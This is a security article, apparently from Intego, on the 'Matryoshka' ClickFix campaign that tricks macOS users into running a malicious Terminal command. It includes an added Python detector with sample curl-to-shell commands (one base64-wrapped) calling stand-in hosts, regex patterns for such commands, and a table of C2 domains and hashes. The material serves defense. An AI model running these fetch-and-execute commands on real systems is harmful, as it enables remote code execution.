A new evolution in the “ClickFix” social engineering campaign targeting macOS users

This article explores ClickFix-style attacks. The latest variant, dubbed Matryoshka because of its nested obfuscation techniques, uses deceptive tactics to trick victims into executing a malicious Terminal command.

While the ClickFix strategy is not new, Matryoshka introduces stronger evasion methods, making detection more challenging for automated sandboxes and network scanners.

Typosquatting and Redirects

The infection chain begins with typosquatting, a common tactic in which attackers register fake versions of popular websites under slightly misspelled names that often go unnoticed. For example, users trying to visit comparisons.org might mistakenly land on comparisions.org, a typosquatted domain targeting macOS users.

For businesses and organizations, it is essential to monitor for suspicious shell activity, particularly fetch-and-execute patterns initiated via Terminal.
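Detection logic for the fetch-and-execute and inline-AppleScript patterns recommended above, written as an added example that is not code from the original article or from the campaign. The sample command lines and hostnames are constructed, and the base64 unwrapping is an assumption about how a nested, Matryoshka-style command might be layered in telemetry:

```python
import base64
import re
from typing import List, Tuple

# Constructed sample events (not from the campaign); hosts use RFC 2606 names.
SAMPLE_EVENTS = [
    "ls -la /Users/alice/Documents",
    "curl -fsSL https://updates.example.invalid/patch.sh | bash",
    "osascript -e 'display dialog \"Hello\"'",
    "echo " + base64.b64encode(b"curl -s https://cdn.example.invalid/r2/ | sh").decode()
    + " | base64 -d | sh",
    "brew install wget",
]

# A downloader piped straight into a shell interpreter.
FETCH_AND_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z|k)?sh\b", re.I)
# Inline AppleScript handed to osascript on the command line.
APPLESCRIPT_INLINE = re.compile(r"\bosascript\b\s+-e\b")
# A base64 decoder in the pipeline, and the blob it would consume.
BASE64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def unwrap_layers(cmd: str, max_depth: int = 5) -> List[str]:
    """Return cmd plus each nested command recovered by decoding base64 layers."""
    layers, current = [cmd], cmd
    for _ in range(max_depth):
        blob = B64_BLOB.search(current)
        if not BASE64_DECODE.search(current) or not blob:
            break
        try:
            current = base64.b64decode(blob.group(0), validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(current)
    return layers

def classify(cmd: str) -> Tuple[bool, List[str]]:
    """Flag fetch-and-execute or inline AppleScript at any layer; depth = nesting."""
    reasons = []
    for depth, layer in enumerate(unwrap_layers(cmd)):
        if FETCH_AND_EXEC.search(layer):
            reasons.append(f"fetch-and-execute at layer {depth}")
        if APPLESCRIPT_INLINE.search(layer):
            reasons.append(f"inline AppleScript at layer {depth}")
    return bool(reasons), reasons

def scan(events: List[str]) -> List[Tuple[str, List[str]]]:
    """Return only the suspicious events, each paired with its reasons."""
    return [(e, r) for e in events for s, r in [classify(e)] if s]
```

The layer index in each reason tells an analyst how many decoding steps hid the real command, which is the signal a single-layer regex over the raw command line would miss.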

Blocking typosquatting domains and monitoring the execution of AppleScripts can also help thwart this type of attack.

| Type | Indicator | Context |
|---|---|---|
| C2 domain | barbermoo[.]xyz | Primary command-and-control infrastructure |
| Typosquatting domain | comparisions[.]org | Initial redirect (typosquat) |
| Gateway URL | macfilesendstream[.]com/r2/ | Traffic distribution / routing |
| Header | api-key: 5190ef17… | Required for C2 communication (truncated) |
| File path | /tmp/osalogging.zip | Staging file for stolen data |
| SHA-256 | 62ca9538889b767b1c3b93e76a32fb4469a2486cb3ccb5fb5fa8beb2dd0c2b90 | Observed sample |
| SHA-256 | d675bff1b895b1a231c86ace9d7a39d5704e84c4bc015525b2a9c80c39158338 | Wrapper script (rogue.sh) |
| SHA-256 | 48770b6493f2b9b9e1d9bdbf482ed981e709bd03e53885ff992121af16f76a09 | Inner loader script |

In Intego's assessment, Matryoshka represents a sophisticated evolution of ClickFix-style attacks, highlighting the ongoing threat posed by social engineering tactics and fileless malware. Preventive measures, such as user awareness and network monitoring, remain essential to protecting against such evolving threats.